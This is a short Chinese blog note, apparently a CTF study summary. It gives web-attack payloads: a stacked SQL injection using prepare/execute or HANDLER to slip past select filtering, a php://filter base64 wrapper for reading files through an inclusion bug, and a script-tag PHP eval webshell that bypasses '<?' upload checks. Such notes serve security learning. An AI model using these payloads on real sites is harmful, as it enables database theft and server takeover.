当前位置: 首页 > news >正文

学习小结8.25

news 2025/11/24 4:51:52

1.堆叠注入能够到列,再要出详细的数据需要构造select语句,如果select被正则匹配拦下,考虑使用

';set@a=16进制编码的查询语句(例如:select * from 表名);prepare execsql from @a;execute execsql;--+

或者

';handler 表名 open as a;handler a read next;--+

2.文件包含中的文件隐藏的flag,使用伪协议做包含

php://filter/convert.base64-encode/resource=文件名

3.文件上传对于<?的检测

可以使用<script language="php">eval($_POST['a'])</script>绕过


http://www.mrgr.cn/news/8570.html

相关文章:

  • 90. UE5 RPG 实现技能的装配
  • CF E. Best Pair
  • 什么是同源策略?
  • ViewModel(4)数据存储和管理
  • 车辆电子围栏系统:守护爱车安全的智能新防线
  • 墨刀基础篇(一):全局事件和动效
  • 2024世界机器人大会盛大开幕,卓翼飞思携无人智能领域产品集中亮相 !
  • 【信创】Linux上lsof命令详解 _ 统信 _ 麒麟 _ 方德
  • MSSQL 工具注入(第一关)
  • 解决在移动端css使用100vh底部被遮盖的问题
  • EmguCV学习笔记 VB.Net 6.5 凸包和凸缺陷
  • 秋招力扣Hot100刷题总结——栈和队列
  • 前端宝典十六:深入浅出8大设计模式
  • 【Material-UI】Radio Group中的 Size 属性详解
  • 51单片机——按键控制
  • 如何备份电脑所有数据?四个方法实现一键备份所有数据
  • OpenGL和OpenCV区别与介绍
  • JavaScript初级——DOM增删改
  • rabbitMQ消息的可靠性
  • 昂科烧录器支持Airoha达发科技的蓝牙音频芯片AB1568